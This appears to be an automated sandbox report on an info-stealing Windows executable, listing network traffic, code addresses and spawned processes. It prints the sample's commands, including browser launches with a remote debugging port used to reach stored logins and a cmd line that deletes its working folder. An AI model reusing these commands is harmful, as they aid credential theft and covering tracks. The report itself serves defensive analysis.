              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54035
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53987
              Source: unknownNetwork traffic detected: HTTP traffic on port 53961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53986
              Source: unknownNetwork traffic detected: HTTP traffic on port 53908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54039
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54041
              Source: unknownNetwork traffic detected: HTTP traffic on port 53984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54040
              Source: unknownNetwork traffic detected: HTTP traffic on port 53898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53990
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54044
              Source: unknownNetwork traffic detected: HTTP traffic on port 53978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54043
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54042
              Source: unknownNetwork traffic detected: HTTP traffic on port 54027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53999
              Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53993
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53996
              Source: unknownNetwork traffic detected: HTTP traffic on port 54038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53995
              Source: unknownNetwork traffic detected: HTTP traffic on port 53876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53948 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53928
              Source: unknownNetwork traffic detected: HTTP traffic on port 53883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53920
              Source: unknownNetwork traffic detected: HTTP traffic on port 53848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53935
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53934
              Source: unknownNetwork traffic detected: HTTP traffic on port 53888 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53933
              Source: unknownNetwork traffic detected: HTTP traffic on port 53972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53932
              Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53930
              Source: unknownNetwork traffic detected: HTTP traffic on port 54033 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53946
              Source: unknownNetwork traffic detected: HTTP traffic on port 53889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53948
              Source: unknownNetwork traffic detected: HTTP traffic on port 53965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53943
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53942
              Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54000
              Source: unknownNetwork traffic detected: HTTP traffic on port 54011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53950
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54004
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54002
              Source: unknownNetwork traffic detected: HTTP traffic on port 54017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54008
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54006
              Source: unknownNetwork traffic detected: HTTP traffic on port 53909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54011
              Source: unknownNetwork traffic detected: HTTP traffic on port 54028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53954 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.9:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.9:53891 version: TLS 1.2
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0040B846 CreateDesktopA,0_2_0040B846

              System Summary

              barindex
              PE file has a writeable .text section
              Source: BHgwhz3lGN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041A0510_2_0041A051
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004240710_2_00424071
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041E0E10_2_0041E0E1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004320810_2_00432081
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F0B10_2_0042F0B1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004191610_2_00419161
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F1710_2_0042F171
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041A1110_2_0041A111
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041B1110_2_0041B111
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004311110_2_00431111
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004241C10_2_004241C1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004301D10_2_004301D1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041E1F10_2_0041E1F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004211910_2_00421191
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041A1B10_2_0041A1B1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041A2510_2_0041A251
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004302610_2_00430261
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004192010_2_00419201
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F2110_2_0042F211
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004242810_2_00424281
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041B2A10_2_0041B2A1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041E2B10_2_0041E2B1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004243410_2_00424341
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F3010_2_0042F301
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004193310_2_00419331
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004043E10_2_004043E1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004243E10_2_004243E1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004303F10_2_004303F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F3F10_2_0042F3F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004313810_2_00431381
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041A4410_2_0041A441
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004324110_2_00432411
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004194F10_2_004194F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F4910_2_0042F491
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004315010_2_00431501
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041B5210_2_0041B521
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F5210_2_0042F521
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004305310_2_00430531
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F5C10_2_0042F5C1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004305D10_2_004305D1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041B5F10_2_0041B5F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004195B10_2_004195B1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004036410_2_00403641
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041A6310_2_0041A631
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004316310_2_00431631
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004206D10_2_004206D1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004186F10_2_004186F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042E6810_2_0042E681
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041A7410_2_0041A741
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042E7410_2_0042E741
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004237710_2_00423771
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042E7F10_2_0042E7F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004207B10_2_004207B1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F7B10_2_0042F7B1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F8510_2_0042F851
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004198610_2_00419861
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004188110_2_00418811
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041A8110_2_0041A811
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004038110_2_00403811
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004308310_2_00430831
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004238310_2_00423831
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004188E10_2_004188E1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004238F10_2_004238F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F8F10_2_0042F8F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042E8910_2_0042E891
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004208A10_2_004208A1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041B8B10_2_0041B8B1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004209410_2_00420941
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042E9510_2_0042E951
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041A9010_2_0041A901
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004039010_2_00403901
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004199F10_2_004199F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004239F10_2_004239F1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042F9810_2_0042F981
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041AA010_2_0041AA01
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00430A110_2_00430A11
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00423AC10_2_00423AC1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041AAD10_2_0041AAD1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00419A810_2_00419A81
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00420AA10_2_00420AA1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00403AB10_2_00403AB1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041AB710_2_0041AB71
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00430B310_2_00430B31
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00403BC10_2_00403BC1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00423B910_2_00423B91
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041BBA10_2_0041BBA1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042DC410_2_0042DC41
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00418C710_2_00418C71
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00419C010_2_00419C01
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00430C010_2_00430C01
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042ECC10_2_0042ECC1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00430CD10_2_00430CD1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00423CE10_2_00423CE1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041BCB10_2_0041BCB1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042FCB10_2_0042FCB1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041BD710_2_0041BD71
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042DD010_2_0042DD01
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00419D110_2_00419D11
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042FDD10_2_0042FDD1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042DDE10_2_0042DDE1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00423DF10_2_00423DF1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041AD910_2_0041AD91
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00430E210_2_00430E21
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041AE310_2_0041AE31
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00418EF10_2_00418EF1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00420E910_2_00420E91
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00436EA20_2_00436EA2
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042FEA10_2_0042FEA1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00419EB10_2_00419EB1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0041AF610_2_0041AF61
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00430F610_2_00430F61
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00420F610_2_00420F61
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00419F710_2_00419F71
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00423F010_2_00423F01
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042DF310_2_0042DF31
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_00430FF10_2_00430FF1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042DFF10_2_0042DFF1
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_0042EFA10_2_0042EFA1
              Source: BHgwhz3lGN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.winEXE@72/339@28/20
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeCode function: 0_2_004201FF CreateToolhelp32Snapshot,Process32First,0_2_004201FF
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\DOM9O968.htmJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\794812dd-6091-4367-b49c-c73c9ab97a59.tmpJump to behavior
              Source: BHgwhz3lGN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 5fctjwlno.0.dr, 89hl6xba1.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: BHgwhz3lGN.exeReversingLabs: Detection: 34%
              Source: unknownProcess created: C:\Users\user\Desktop\BHgwhz3lGN.exe "C:\Users\user\Desktop\BHgwhz3lGN.exe"
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2100,i,2626342174321460321,8661316679796847661,262144 /prefetch:8
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2272,i,10543292618471118096,2604658211909897831,262144 /prefetch:3
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:3
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7152 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7396 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\6xb1d" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
              Source: C:\Users\user\Desktop\BHgwhz3lGN.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\6xb1d" & exitJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2100,i,2626342174321460321,8661316679796847661,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2272,i,10543292618471118096,2604658211909897831,262144 /prefetch:3Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:3Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
